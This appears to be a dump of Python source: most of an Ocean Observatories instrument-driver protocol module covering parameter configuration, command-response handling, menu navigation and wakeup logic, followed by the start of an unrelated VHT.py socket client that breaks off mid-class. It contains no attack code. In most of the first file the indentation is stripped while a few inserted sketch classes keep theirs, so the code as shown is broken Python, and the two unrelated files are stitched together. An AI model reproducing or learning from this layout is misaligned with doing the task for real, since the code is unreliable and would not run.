# Store the scheduler configuration
self._scheduler_config[name] = {
DriverSchedulerConfigKey.TRIGGER: job_config.get(DriverSchedulerConfigKey.TRIGGER),
DriverSchedulerConfigKey.CALLBACK: callback
}
config = {name: self._scheduler_config[name]}
log.debug("Scheduler job with config: %r", config)
# start the job. Note, this lazily starts the scheduler too :)
self._scheduler.add_config(config)
def _get_scheduler_config(self):
"""
Get the configuration dictionary to use for initializing jobs
Returned dictionary structure:
{
'job_name': {
DriverSchedulerConfigKey.TRIGGER: {}
}
}
@return: scheduler configuration dictionary
"""
# Currently the startup config is in the child class.
config = self._startup_config
return config.get(DriverConfigKey.SCHEDULER)
def initialize_scheduler(self):
"""
Activate all configured schedulers added using _add_scheduler.
Timers start when the job is activated.
"""
log.debug("Scheduler config: %r", self._get_scheduler_config())
log.debug("Scheduler callbacks: %r", self._scheduler_callback)
self._scheduler = DriverScheduler()
for name in self._scheduler_callback.keys():
log.debug("Add job for callback: %s", name)
self._add_scheduler_job(name)
#############################################################
# Gap recovery logic
#############################################################
def _start_gap_recovery(self, *args, **kwargs):
"""
Currently this is just a mock implementation so the agent
tests could be put in place. Before this code goes into
production it needs to be completed.
Start a new gap recovery thread to publish samples.
"""
raise NotImplementedException("Needs to be implemented")
#############################################################
# Configuration logic
#############################################################
def apply_startup_params(self):
"""
Apply the startup values previously stored in the protocol to
the running config of the live instrument. The startup values are the
values that are (1) marked as startup parameters and are (2) the "best"
value to use at startup. Preference is given to the previously-set init
value, then the default value, then the currently used value.
This default method assumes a dict of parameter name and value for
the configuration.
@raise InstrumentParameterException If the config cannot be applied
"""
# Let's give it a try in unknown state
log.debug("apply_startup_params start")
config = self.get_startup_config()
log.debug("apply_startup_params: startup config: %s", config)
readonly = self._param_dict.get_visibility_list(ParameterDictVisibility.READ_ONLY)
log.debug("apply_startup_params: Read only keys: %s", readonly)
for (key, val) in config.iteritems():
if key in readonly:
raise InstrumentParameterException("Attempt to set read only parameter (%s)" % key)
self._set_params(config, True)
def apply_direct_access_params(self):
"""
Apply the da params values previously stored in the protocol to
the running config of the live instrument.
@raise InstrumentParameterException If the config cannot be applied
"""
# Let's give it a try in unknown state
log.debug("apply_direct_access_params start")
config = self.get_direct_access_config()
log.debug("apply_direct_access_params: direct_access config: %s", config)
self._set_params(config, True)
def _set_params(self, *args, **kwargs):
"""
Issue commands to the instrument to set various parameters. If
startup is set to true that means we are setting startup values
and immutable parameters can be set. Otherwise only READ_WRITE
parameters can be set.
must be overloaded in derived classes
@param params dictionary containing parameter name and value
        @param startup bool, true if we are initializing, false otherwise
@raise NotImplementedException
"""
raise NotImplementedException("_set_params must be overloaded")
def set_init_params(self, config):
"""
Set the initialization parameters to the given values in the protocol
parameter dictionary.
@param config The parameter_name/value to set in the initialization
fields of the parameter dictionary
@raise InstrumentParameterException If the config cannot be set
"""
if not isinstance(config, dict):
raise InstrumentParameterException("Invalid init config format")
self._startup_config = config
param_config = config.get(DriverConfigKey.PARAMETERS)
if param_config:
for name in param_config.keys():
log.debug("Setting init value for %s to %s", name, param_config[name])
self._param_dict.set_init_value(name, param_config[name])
def enable_da_initialization(self):
"""
Tell the protocol to initialize parameters using the stored direct access
config when in a state that can set parameters
"""
self._init_type = InitializationType.DIRECTACCESS
def store_direct_access_config(self, config):
"""
Save the direct access configuration in the object. This is generally
called from the driver because it is responsible for reading the config.
@param config DA configuration to store.
"""
self._pre_direct_access_config = config
def get_direct_access_config(self):
"""
Gets the direct access stored configuration for the instrument.
        @retval The dict of parameter_name/values that should be set at a
            higher level (override this method if it is more involved for a
            specific instrument).
"""
return self._pre_direct_access_config
def get_direct_config(self):
"""
Gets the port agent's direct access configuration and instrument specific direct access commands.
:return: dictionary
"""
return {'title': self._display_name, 'character_delay': self._character_delay, 'eol': self._newline,
'input_dict': self._direct_commands}
def get_startup_config(self):
"""
Gets the startup configuration for the instrument. The parameters
returned are marked as startup, and the values are the best as chosen
from the initialization, default, and current parameters.
        @retval The dict of parameter_name/values that should be set at a
            higher level (override this method if it is more involved for a
            specific instrument).
        @raise InstrumentProtocolException if a startup parameter doesn't
            have an init or default value
"""
return_dict = {}
start_list = self._param_dict.get_keys()
log.trace("Startup list: %s", start_list)
assert isinstance(start_list, list)
for param in start_list:
result = self._param_dict.get_config_value(param)
if result is not None:
return_dict[param] = result
elif self._param_dict.is_startup_param(param):
raise InstrumentProtocolException("Required startup value not specified: %s" % param)
log.debug("Applying startup config: %s", return_dict)
return return_dict
def get_direct_access_params(self):
"""
Get the list of direct access parameters, useful for restoring direct
access configurations up in the driver.
@retval a list of direct access parameter names
"""
return self._param_dict.get_direct_access_list()
def get_cached_config(self):
"""
Return the configuration object that shows the instrument's
        configuration as cached in the parameter dictionary; usually in
        sync with the instrument, but accessible when offline.
@retval The cached configuration in the instruments config format. By
default, it is a dictionary of parameter names and values.
"""
assert self._param_dict is not None
return self._param_dict.get_all(timestamp=0)
def get_config_metadata_dict(self):
"""
        Return a dict of metadata about the protocol's driver support,
command formats, and parameter formats. The format should be easily
JSONifyable (as will happen in the driver on the way out to the agent)
@retval A python dict that represents the metadata
@see https://confluence.oceanobservatories.org/display/syseng/
CIAD+MI+SV+Instrument+Driver-Agent+parameter+and+command+metadata+exchange
"""
log.debug("Getting metadata dict from protocol...")
return_dict = {ConfigMetadataKey.DRIVER: self._driver_dict.generate_dict(),
ConfigMetadataKey.COMMANDS: self._cmd_dict.generate_dict(),
ConfigMetadataKey.PARAMETERS: self._param_dict.generate_dict()}
return return_dict
########################################################################
# Command build and response parse handlers.
########################################################################
def _add_response_handler(self, cmd, func, state=None):
"""
Insert a handler class responsible for handling the response to a
command sent to the instrument, optionally available only in a
specific state.
@param cmd The high level key of the command to respond to.
@param func The function that handles the response
@param state The state to pair with the command for which the function
should be used
"""
if state is None:
self._response_handlers[cmd] = func
else:
self._response_handlers[(state, cmd)] = func
def _add_build_handler(self, cmd, func):
"""
Add a command building function.
@param cmd The device command to build.
@param func The function that constructs the command.
"""
self._build_handlers[cmd] = func
########################################################################
# Helpers to build commands.
########################################################################
def _build_simple_command(self, cmd, *args):
"""
Builder for simple commands
@param cmd The command to build
@param args Unused arguments
@retval Returns string ready for sending to instrument
"""
return "%s%s" % (cmd, self._newline)
def _build_keypress_command(self, cmd, *args):
"""
Builder for simple, non-EOLN-terminated commands
@param cmd The command to build
@param args Unused arguments
@retval Returns string ready for sending to instrument
"""
return "%s" % cmd
def _build_multi_keypress_command(self, cmd, *args):
"""
        Builder for simple, non-EOLN-terminated commands sent as repeated keypresses
@param cmd The command to build
@param args Unused arguments
@retval Returns string ready for sending to instrument
"""
return "%s%s%s%s%s%s" % (cmd, cmd, cmd, cmd, cmd, cmd)
########################################################################
# Static helpers to format set commands.
########################################################################
@staticmethod
def _true_false_to_string(v):
"""
Write a boolean value to string formatted for "generic" set operations.
Subclasses should overload this as needed for instrument-specific
formatting.
@param v a boolean value.
        @retval The value formatted as a Python boolean string ('True'/'False') for set operations.
@throws InstrumentParameterException if value not a bool.
"""
if not isinstance(v, bool):
raise InstrumentParameterException('Value %s is not a bool.' % str(v))
return str(v)
@staticmethod
def _int_to_string(v):
"""
Write an int value to string formatted for "generic" set operations.
Subclasses should overload this as needed for instrument-specific
formatting.
@param v An int val.
@retval an int string formatted for generic set operations.
@throws InstrumentParameterException if value not an int.
"""
if not isinstance(v, int):
raise InstrumentParameterException('Value %s is not an int.' % str(v))
else:
return '%i' % v
@staticmethod
def _float_to_string(v):
"""
Write a float value to string formatted for "generic" set operations.
Subclasses should overload this as needed for instrument-specific
formatting.
@param v A float val.
@retval a float string formatted for "generic" set operations.
@throws InstrumentParameterException if value is not a float.
"""
if not isinstance(v, float):
raise InstrumentParameterException('Value %s is not a float.' % v)
else:
return '%e' % v
def _get_param_list(self, *args, **kwargs):
"""
        Return a list of parameters based on the list passed in. If the
        list contains an ALL-parameters request then the returned list will
        contain all parameters; otherwise the original list is returned. The
        list is also checked for unknown parameters.
@param args[0] list of parameters to inspect
@return: list of parameters.
@raises: InstrumentParameterException when the wrong param type is passed
in or an unknown parameter is in the list
"""
try:
param_list = args[0]
except IndexError:
raise InstrumentParameterException('Parameter required, none specified')
if isinstance(param_list, basestring):
param_list = [param_list]
elif not isinstance(param_list, (list, tuple)):
raise InstrumentParameterException("Expected a list, tuple or a string")
# Verify all parameters are known parameters
bad_params = []
known_params = self._param_dict.get_keys() + [DriverParameter.ALL]
for param in param_list:
if param not in known_params:
bad_params.append(param)
if len(bad_params):
raise InstrumentParameterException("Unknown parameters: %s" % bad_params)
if DriverParameter.ALL in param_list:
return self._param_dict.get_keys()
else:
return param_list
def shutdown(self):
if self._scheduler:
self._scheduler.shutdown()
self._scheduler = None
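# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the production code): a minimal protocol
# subclass showing how _set_params() is typically overloaded so that
# apply_startup_params() above can push the result of get_startup_config()
# to the instrument.  The debug logging stands in for the instrument-specific
# set command a real driver would send.
# ---------------------------------------------------------------------------
class _ExampleSetParamsProtocol(InstrumentProtocol):
    """
    Sketch only: demonstrates the _set_params() contract documented above.
    """
    def _set_params(self, *args, **kwargs):
        try:
            params = args[0]
        except IndexError:
            raise InstrumentParameterException('_set_params requires a parameter dict')
        startup = bool(args[1]) if len(args) > 1 else False
        if not isinstance(params, dict):
            raise InstrumentParameterException('Invalid parameter dict format')
        for (key, val) in params.iteritems():
            # A real driver would issue its set command here and verify the
            # response; startup=True also allows IMMUTABLE parameters.
            log.debug("sketch _set_params: %s = %s (startup=%s)", key, val, startup)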
class CommandResponseInstrumentProtocol(InstrumentProtocol):
"""
Base class for text-based command-response instruments.
"""
def __init__(self, prompts, newline, driver_event):
"""
Constructor.
@param prompts Enum class containing possible device prompts used for
command response logic.
@param newline The device newline.
        @param driver_event The callback for asynchronous driver events.
"""
# Construct superclass.
InstrumentProtocol.__init__(self, driver_event)
# The end of line delimiter.
self._newline = newline
# Class of prompts used by device.
self._prompts = prompts
# Line buffer for input from device.
self._linebuf = ''
# Short buffer to look for prompts from device in command-response
# mode.
self._promptbuf = ''
# Lines of data awaiting further processing.
self._datalines = []
# Handlers to build commands.
self._build_handlers = {}
# Handlers to parse responses.
self._response_handlers = {}
self._last_data_timestamp = 0
def _get_prompts(self):
"""
        Return a list of prompts ordered from longest to shortest. The
        assumption is that the longer prompt is more specific.
        @return: list of prompts ordered by length.
"""
if isinstance(self._prompts, list):
prompts = self._prompts
else:
prompts = self._prompts.list()
prompts.sort(lambda x, y: cmp(len(y), len(x)))
return prompts
def _get_response(self, timeout=10, expected_prompt=None, response_regex=None):
"""
        Get a response from the instrument, but be a bit loose with what we
        find. Leave some room for whitespace around prompts and don't try to
        match it exactly, just in case we are off by a little whitespace or not
        quite at the end of a line.
@todo Consider cases with no prompt
@param timeout The timeout in seconds
@param expected_prompt Only consider the specific expected prompt as
presented by this string
        @param response_regex Look for a response value that matches the
        supplied compiled regex pattern. Groups that match will be returned as a
        string. Cannot be used together with expected_prompt. None will be
        returned as the prompt with this match. If a regex is supplied, the
        internal prompt list will be ignored.
        @retval Regex search result tuple (as MatchObject.groups() would return)
        if a response_regex is supplied, or a tuple of (prompt, response) if a
        prompt is looked for.
@throw InstrumentProtocolException if both regex and expected prompt are
passed in or regex is not a compiled pattern.
@throw InstrumentTimeoutException on timeout
"""
# Grab time for timeout and wait for prompt.
starttime = time.time()
if response_regex and not isinstance(response_regex, RE_PATTERN):
raise InstrumentProtocolException('Response regex is not a compiled pattern!')
if expected_prompt and response_regex:
raise InstrumentProtocolException('Cannot supply both regex and expected prompt!')
if expected_prompt is None:
prompt_list = self._get_prompts()
else:
if isinstance(expected_prompt, basestring):
prompt_list = [expected_prompt]
else:
prompt_list = expected_prompt
if response_regex is None:
pattern = None
else:
pattern = response_regex.pattern
log.debug('_get_response: timeout=%s, prompt_list=%s, expected_prompt=%r, response_regex=%r, promptbuf=%r',
timeout, prompt_list, expected_prompt, pattern, self._promptbuf)
while True:
if response_regex:
match = response_regex.search(self._linebuf)
if match:
return match.groups()
else:
for item in prompt_list:
index = self._promptbuf.find(item)
if index >= 0:
result = self._promptbuf[0:index + len(item)]
return item, result
time.sleep(.1)
if time.time() > starttime + timeout:
raise InstrumentTimeoutException("in InstrumentProtocol._get_response()")
def _get_raw_response(self, timeout=10, expected_prompt=None):
"""
        Get a response from the instrument, but don't trim whitespace. Used
        when the whitespace is what we are looking for.
@param timeout The timeout in seconds
@param expected_prompt Only consider the specific expected prompt as
presented by this string
        @throw InstrumentTimeoutException on timeout
"""
# Grab time for timeout and wait for prompt.
strip_chars = "\t "
starttime = time.time()
if expected_prompt is None:
prompt_list = self._get_prompts()
else:
if isinstance(expected_prompt, basestring):
prompt_list = [expected_prompt]
else:
prompt_list = expected_prompt
while True:
for item in prompt_list:
if self._promptbuf.rstrip(strip_chars).endswith(item.rstrip(strip_chars)):
return item, self._linebuf
else:
time.sleep(.1)
if time.time() > starttime + timeout:
raise InstrumentTimeoutException("in InstrumentProtocol._get_raw_response()")
def _do_cmd_resp(self, cmd, *args, **kwargs):
"""
Perform a command-response on the device.
@param cmd The command to execute.
@param args positional arguments to pass to the build handler.
@param write_delay kwarg for the amount of delay in seconds to pause
between each character. If none supplied, the DEFAULT_WRITE_DELAY
value will be used.
@param timeout optional wakeup and command timeout via kwargs.
@param expected_prompt kwarg offering a specific prompt to look for
other than the ones in the protocol class itself.
@param response_regex kwarg with a compiled regex for the response to
match. Groups that match will be returned as a string.
Cannot be supplied with expected_prompt. May be helpful for
instruments that do not have a prompt.
@retval resp_result The (possibly parsed) response result including the
first instance of the prompt matched. If a regex was used, the prompt
will be an empty string and the response will be the joined collection
of matched groups.
@raises InstrumentTimeoutException if the response did not occur in time.
@raises InstrumentProtocolException if command could not be built or if response
was not recognized.
"""
# Get timeout and initialize response.
timeout = kwargs.get('timeout', DEFAULT_CMD_TIMEOUT)
expected_prompt = kwargs.get('expected_prompt', None)
response_regex = kwargs.get('response_regex', None)
write_delay = kwargs.get('write_delay', DEFAULT_WRITE_DELAY)
if response_regex and not isinstance(response_regex, RE_PATTERN):
raise InstrumentProtocolException('Response regex is not a compiled pattern!')
if expected_prompt and response_regex:
raise InstrumentProtocolException('Cannot supply both regex and expected prompt!')
# Get the build handler.
build_handler = self._build_handlers.get(cmd, None)
if not build_handler:
raise InstrumentProtocolException('Cannot build command: %s' % cmd)
if not callable(build_handler):
raise InstrumentProtocolException('Build handler is not callable')
cmd_line = build_handler(cmd, *args)
# Wakeup the device, pass up exception if timeout
self._wakeup(timeout)
# Clear line and prompt buffers for result.
self._linebuf = ''
self._promptbuf = ''
# Send command.
log.debug('_do_cmd_resp: %r, timeout=%s, write_delay=%s, expected_prompt=%r, response_regex=%r',
cmd_line, timeout, write_delay, expected_prompt, response_regex)
if write_delay == 0:
self._connection.send(cmd_line)
else:
for char in cmd_line:
self._connection.send(char)
time.sleep(write_delay)
# Wait for the prompt, prepare result and return, timeout exception
if response_regex:
prompt = ""
result_tuple = self._get_response(timeout,
response_regex=response_regex,
expected_prompt=expected_prompt)
result = "".join(result_tuple)
else:
(prompt, result) = self._get_response(timeout,
expected_prompt=expected_prompt)
resp_handler = (self._response_handlers.get((self.get_current_state(), cmd), None) or
self._response_handlers.get(cmd, None))
if callable(resp_handler):
return resp_handler(result, prompt)
return None
def _do_cmd_no_resp(self, cmd, *args, **kwargs):
"""
Issue a command to the instrument after a wake up and clearing of
buffers. No response is handled as a result of the command.
@param cmd The command to execute.
@param args positional arguments to pass to the build handler.
        @param timeout optional wakeup timeout.
@raises InstrumentTimeoutException if the response did not occur in time.
@raises InstrumentProtocolException if command could not be built.
"""
timeout = kwargs.get('timeout', DEFAULT_CMD_TIMEOUT)
write_delay = kwargs.get('write_delay', DEFAULT_WRITE_DELAY)
build_handler = self._build_handlers.get(cmd, None)
if not callable(build_handler):
log.error('_do_cmd_no_resp: no handler for command: %s', cmd)
raise InstrumentProtocolException(error_code=InstErrorCode.BAD_DRIVER_COMMAND)
cmd_line = build_handler(cmd, *args)
# Wakeup the device, timeout exception as needed
self._wakeup(timeout)
# Clear line and prompt buffers for result.
self._linebuf = ''
self._promptbuf = ''
# Send command.
log.debug('_do_cmd_no_resp: %r, timeout=%s', cmd_line, timeout)
if write_delay == 0:
self._connection.send(cmd_line)
else:
for char in cmd_line:
self._connection.send(char)
time.sleep(write_delay)
def _do_cmd_direct(self, cmd):
"""
Issue an untranslated command to the instrument. No response is handled
as a result of the command.
@param cmd The high level command to issue
"""
# Send command.
log.debug('_do_cmd_direct: %r', cmd)
self._connection.send(cmd)
########################################################################
# Incoming data (for parsing) callback.
########################################################################
def got_data(self, port_agent_packet):
"""
Called by the instrument connection when data is available.
Append line and prompt buffers.
Also add data to the chunker and when received call got_chunk to publish results.
:param port_agent_packet: raw data from instrument
"""
data_length = port_agent_packet.get_data_length()
data = port_agent_packet.get_data()
timestamp = port_agent_packet.get_timestamp()
log.debug("Got Data: %r", data)
log.debug("Add Port Agent Timestamp: %s", timestamp)
if data_length > 0:
if self.get_current_state() == DriverProtocolState.DIRECT_ACCESS:
self._driver_event(DriverAsyncEvent.DIRECT_ACCESS, data)
self.add_to_buffer(data)
self._chunker.add_chunk(data, timestamp)
(timestamp, chunk) = self._chunker.get_next_data()
while chunk:
self._got_chunk(chunk, timestamp)
(timestamp, chunk) = self._chunker.get_next_data()
########################################################################
# Incoming raw data callback.
########################################################################
def got_raw(self, port_agent_packet):
"""
        Called by the port agent client when raw data is available, such as data
        sent by the driver to the instrument, the instrument responses, etc.
:param port_agent_packet: raw data from instrument
"""
self.publish_raw(port_agent_packet)
def publish_raw(self, port_agent_packet):
"""
Publish raw data
:param port_agent_packet: raw data from instrument
"""
particle = RawDataParticle(port_agent_packet.get_as_dict(),
port_timestamp=port_agent_packet.get_timestamp())
if self._driver_event:
self._driver_event(DriverAsyncEvent.SAMPLE, particle.generate())
def wait_for_particles(self, particle_classes, timeout=0):
"""
Wait for a set of particles to get generated within the specified timeout.
Return a list of particles
@param particle_classes: a list of data particle classes
        @param timeout: absolute deadline (a time.time() value) after which to stop waiting
"""
# Ensure that particle_classes is a list
if not isinstance(particle_classes, (list, tuple)):
particle_classes = [particle_classes]
# Make a copy of the list before mutating it
particle_classes = particle_classes[:]
particles = []
while True:
for particle_class in particle_classes[:]:
if particle_class in self._particle_dict:
log.debug("Particle found for %s" % particle_class)
particle = self._particle_dict.pop(particle_class)
particle_classes.remove(particle_class)
particles.append(particle)
if not particle_classes:
return particles
if time.time() > timeout:
break
time.sleep(0.1)
log.debug("Timeout expired - unable to find all requested particles.")
return particles
def add_to_buffer(self, data):
"""
        Add a chunk of data to the internal data buffers.
        The buffers keep only the most recent MAX_BUFFER_SIZE bytes; older
        data is dropped from the front when the limit is exceeded.
@param data: bytes to add to the buffer
"""
# Update the line and prompt buffers.
# If our buffer exceeds the max allowable size then drop the leading
# characters on the floor.
maxbuf = self._max_buffer_size()
self._linebuf = (self._linebuf + data)[-maxbuf:]
self._promptbuf = (self._promptbuf + data)[-maxbuf:]
self._last_data_timestamp = time.time()
def _max_buffer_size(self):
return MAX_BUFFER_SIZE
########################################################################
# Wakeup helpers.
########################################################################
def _send_wakeup(self):
"""
Send a wakeup to the device. Overridden by device specific
subclasses.
"""
pass
def _wakeup(self, timeout, delay=1):
"""
Clear buffers and send a wakeup command to the instrument
@param timeout The timeout to wake the device.
@param delay The time to wait between consecutive wakeups.
@throw InstrumentTimeoutException if the device could not be woken.
"""
# Clear the prompt buffer.
log.trace("clearing promptbuf: %r", self._promptbuf)
self._promptbuf = ''
# Grab time for timeout.
starttime = time.time()
while True:
# Send a line return and wait a sec.
log.trace('Sending wakeup. timeout=%s', timeout)
self._send_wakeup()
time.sleep(delay)
log.trace("Prompts: %s", self._get_prompts())
for item in self._get_prompts():
log.trace("buffer: %r", self._promptbuf)
log.trace("find prompt: %r", item)
index = self._promptbuf.find(item)
log.trace("Got prompt (index: %s): %r ", index, self._promptbuf)
if index >= 0:
log.trace('wakeup got prompt: %r', item)
return item
log.trace("Searched for all prompts")
if time.time() > starttime + timeout:
raise InstrumentTimeoutException("in _wakeup()")
def _wakeup_until(self, timeout, desired_prompt, delay=1, no_tries=5):
"""
Continue waking device until a specific prompt appears or a number
of tries has occurred. Desired prompt must be in the instrument's
prompt list.
@param timeout The timeout to wake the device.
        @param desired_prompt Continue waking until this prompt is seen.
        @param delay Time to wait between consecutive wakeups.
        @param no_tries Maximum number of wakeup tries to see the desired prompt.
@raises InstrumentTimeoutException if device could not be woken.
@raises InstrumentProtocolException if the desired prompt is not seen in the
maximum number of attempts.
"""
count = 0
while True:
prompt = self._wakeup(timeout, delay)
if prompt == desired_prompt:
break
else:
time.sleep(delay)
count += 1
if count >= no_tries:
raise InstrumentProtocolException('Incorrect prompt.')
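# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the production code): a minimal
# command/response protocol showing how the build and response handlers
# documented above are wired together.  The 'ds' command, the '<Executed/>'
# prompt and the CRLF newline are assumptions made purely for illustration;
# a real driver would also attach a port agent connection and an FSM before
# issuing commands.
# ---------------------------------------------------------------------------
class _ExampleCommandProtocol(CommandResponseInstrumentProtocol):
    """
    Sketch only: registers one build handler and one response handler, then
    issues the command with _do_cmd_resp().
    """
    def __init__(self, driver_event):
        CommandResponseInstrumentProtocol.__init__(self, ['<Executed/>'], '\r\n', driver_event)
        # 'ds' is built into 'ds\r\n' by the generic simple-command builder.
        self._add_build_handler('ds', self._build_simple_command)
        # The parsed response of 'ds' is produced by _parse_ds_response().
        self._add_response_handler('ds', self._parse_ds_response)
    @staticmethod
    def _parse_ds_response(response, prompt):
        # A real driver would update self._param_dict from the response here.
        return response.strip()
    def _example_status(self):
        # Wakes the instrument, sends 'ds', waits for '<Executed/>' and runs
        # the registered response handler on the collected text.
        return self._do_cmd_resp('ds', timeout=30)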
class MenuInstrumentProtocol(CommandResponseInstrumentProtocol):
"""
Base class for menu-based instrument interfaces that can use a cmd/response approach to
walking down the menu from its root.
"""
class MenuTree(object):
# The _node_directions variable is a dictionary of menu sub-menus keyed by the sub-menu's name.
# Each sub-menu entry contains a list of directions, which are either cmd/response pairs or
# sub_menu names. These commands need to be executed in the specified order to get from the root menu
# to the sub-menu.
# example:
#
# for these enumerations:
#
# class SubMenues(BaseEnum):
# SUB_MENU1 = 'sub_menu1'
# SUB_MENU2 = 'sub_menu2'
# SUB_MENU3 = 'sub_menu3'
# SUB_MENU4 = 'sub_menu4'
#
# class InstrumentPrompts(BaseEnum):
# MAIN_MENU = '\a\b ? \a\b'
# SUB_MENU1 = '\a\b 1'
# SUB_MENU2 = '\a\b 2'
# SUB_MENU3 = '\a\b 3'
# SUB_MENU4 = '\a\b 4'
#
# the instance creation could look like:
#
# Directions = MenuInstrumentProtocol.MenuTree.Directions
#
# menu = MenuInstrumentProtocol.MenuTree({
# SubMenues.SUB_MENU1 : [Directions("1", InstrumentPrompts.SUB_MENU1)],
# SubMenues.SUB_MENU2 : [Directions("2", InstrumentPrompts.SUB_MENU2)],
# SubMenues.SUB_MENU3 : [Directions(SubMenues.SUB_MENU2),
# Directions("2", InstrumentPrompts.SUB_MENU3, 20)],
# SubMenues.SUB_MENU4 : [Directions(SubMenues.SUB_MENU3),
# Directions("d", InstrumentPrompts.SUB_MENU4)]
# })
#
# After passing the menu into the constructor via:
# MenuInstrumentProtocol.__init__(self, menu, prompts, newline, driver_event)
#
# directions can be retrieved for a sub-menu using:
#
# directions_list = self._menu.get_directions(SubMenues.SUB_MENU4)
#
# which should return a list of Directions objects which can be used to walk from
# the root menu to the sub-menu as follows:
#
# for directions in directions_list:
# command = directions.get_command()
# response = directions.get_response()
# timeout = directions.get_timeout()
        #     _do_cmd_resp(command, expected_prompt=response, timeout=timeout)
class Directions(object):
def __init__(self, command=None, response=None, timeout=10):
if command is None:
raise InstrumentProtocolException('MenuTree.Directions(): command parameter missing')
self.command = command
self.response = response
self.timeout = timeout
def __str__(self):
return "command=%r, response=%r, timeout=%r" % (self.command, self.response, self.timeout)
def get_command(self):
return self.command
def get_response(self):
return self.response
def get_timeout(self):
return self.timeout
_node_directions = {}
def __init__(self, node_directions):
if not isinstance(node_directions, dict):
raise InstrumentProtocolException('MenuTree.__init__(): node_directions parameter not a dictionary')
self._node_directions = node_directions
def get_directions(self, node):
try:
directions_list = self._node_directions[node]
            except (KeyError, TypeError):
raise InstrumentProtocolException(
'MenuTree.get_directions(): node %s not in _node_directions dictionary'
% str(node))
log.trace("MenuTree.get_directions(): _node_directions = %s, node = %s, d_list = %s",
self._node_directions, node, directions_list)
directions = []
for item in directions_list:
if not isinstance(item, self.Directions):
raise InstrumentProtocolException(
'MenuTree.get_directions(): item %s in directions list not a Directions object'
% str(item))
if item.response is not None:
directions.append(item)
else:
directions += self.get_directions(item.command)
return directions
def __init__(self, menu, prompts, newline, driver_event, **kwargs):
"""
Constructor.
@param prompts Enum class containing possible device prompts used for
        the menu system.
@param newline The device newline.
@param driver_event The callback for asynchronous driver events.
@param read_delay optional kwarg specifying amount of time to delay before
attempting to read response from instrument (in _get_response).
"""
# Construct superclass.
CommandResponseInstrumentProtocol.__init__(self, prompts, newline, driver_event)
self._menu = menu
# The end of line delimiter.
self._newline = newline
# Class of prompts used by device.
self._prompts = prompts
# Linebuffer for input from device.
self._linebuf = ''
# Short buffer to look for prompts from device in command-response
# mode.
self._promptbuf = ''
# Lines of data awaiting further processing.
self._datalines = []
# Handlers to build commands.
self._build_handlers = {}
# Handlers to parse responses.
self._response_handlers = {}
self._last_data_timestamp = 0
# Initialize read_delay
self._read_delay = kwargs.get('read_delay', None)
def _get_response(self, timeout=10, expected_prompt=None, **kwargs):
"""
Get a response from the instrument
@todo Consider cases with no prompt
@param timeout The timeout in seconds
@param expected_prompt Only consider the specific expected prompt as
presented by this string
        @throw InstrumentTimeoutException on timeout
"""
# Because the output of the instrument does not generate events, do_cmd_resp
# jumps right in here looking for a response, and often it is before the
# complete response has arrived, so we can miss it. The read delay
# is to alleviate that problem.
if self._read_delay is not None:
time.sleep(self._read_delay)
return CommandResponseInstrumentProtocol._get_response(self,
timeout=timeout,
expected_prompt=expected_prompt)
def _navigate(self, menu, **kwargs):
"""
        Navigate to the given sub-menu and stop there (no command is executed).
@param menu The enum for the menu to navigate to.
@retval A tuple of result and parameter of the last menu encountered
@throw InstrumentProtocolException When the destination cannot be reached.
"""
# Get dest_submenu arg
if menu is None:
raise InstrumentProtocolException('Menu parameter missing')
result = (None, None) # base case in case of empty directions list
# iterate through the directions
directions_list = self._menu.get_directions(menu)
for directions in directions_list:
log.debug('_navigate: directions: %s', directions)
command = directions.get_command()
response = directions.get_response()
timeout = directions.get_timeout()
result = self._do_cmd_resp(command, expected_prompt=response,
timeout=timeout, **kwargs)
return result
def _navigate_and_execute(self, cmd, expected_prompt=None, **kwargs):
"""
Navigate to a sub-menu and execute a command.
@param cmd The command to execute.
@param expected_prompt optional kwarg passed through to do_cmd_resp.
        @param timeout optional wakeup and command timeout.
@param write_delay optional kwarg passed through to do_cmd_resp.
@throws InstrumentTimeoutException if the response did not occur in time.
@throws InstrumentProtocolException if command could not be built or if response
was not recognized.
"""
        self._navigate(kwargs['dest_submenu'], **kwargs)
"""
DHE: this is a kludge; need a way to send a parameter as a "command." We can't expect to look
up all possible values in the build_handlers
"""
value = kwargs.pop('value', None)
if cmd is None:
cmd_line = self._build_simple_command(value)
log.debug('_navigate_and_execute: sending value: %r to connection.send.', cmd_line)
self._connection.send(cmd_line)
return None
else:
log.debug('_navigate_and_execute: sending cmd: %r with kwargs: %r to _do_cmd_resp.', cmd, kwargs)
            return self._do_cmd_resp(cmd, expected_prompt=expected_prompt, **kwargs)
def _go_to_root_menu(self):
"""
        This method needs to be implemented for each instrument. It performs the commands that
        return the instrument to its root menu.
"""
raise NotImplementedException('_go_to_root_menu() not implemented.')
def got_data(self, data):
"""
Called by the instrument connection when data is available.
Append line and prompt buffers. Extended by device specific
subclasses.
:param data: data to process
"""
CommandResponseInstrumentProtocol.got_data(self, data)
|
VHT.py
|
from multiprocessing import Process,Semaphore
import multiprocessing as mp
import socket
import cmsisdsp.sdf.nodes.host.message as msg
HOST = '127.0.0.1' # The remote host
PORT = 50007
class ModelicaConnectionLost(Exception):
pass
def connectToServer(inputMode,theid):
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
# Identify as vht input
if inputMode:
print("Connecting as INPUT")
theBytes=msg.list_to_bytes(msg.clientID(msg.VSIINPUT,theid))
else:
print("Connecting as OUTPUT")
theBytes=msg.list_to_bytes(msg.clientID(msg.VSIOUTPUT,theid))
#print("vs0: %d %d" % (int(theBytes[0]),int(theBytes[1])))
msg.sendBytes(s,theBytes)
return(s)
def source(theid,size,queue,started):
s=connectToServer(True,theid)
started.release()
try:
while True:
received=msg.receiveBytes(s,size)
queue.put(received)
except Exception as inst:
print(inst)
finally:
queue.close()
def sink(theid,size,queue,started):
s=connectToServer(False,theid)
data= bytes(size)
msg.sendBytes(s,data)
started.release()
try:
while True:
tosend=queue.get(True,2)
msg.sendBytes(s,tosend)
except Exception as inst:
print(inst)
finally:
queue.close()
class Source:
def __init__(self,theid,bufferSize):
self._bufferSize_ = bufferSize
self._srcQueue_ = mp.Queue()
self._started_ = Semaphore()
        # Q15 data is sent, so bufferSize gets a *2 factor since the
        # source function works with bytes
self._src_ = Process(target=source, args=(theid,2*bufferSize,self._srcQueue_,self._started_))
self._src_.start()
@property
def queue(self):
return(self._srcQueue_)
def get(self):
if self._src_.exitcode is None:
return(msg.bytes_to_list(self.queue.get(True,2)))
else:
raise ModelicaConnectionLost
def end(self):
self._src_.terminate()
def wait(self):
self._started_.acquire()
class Sink:
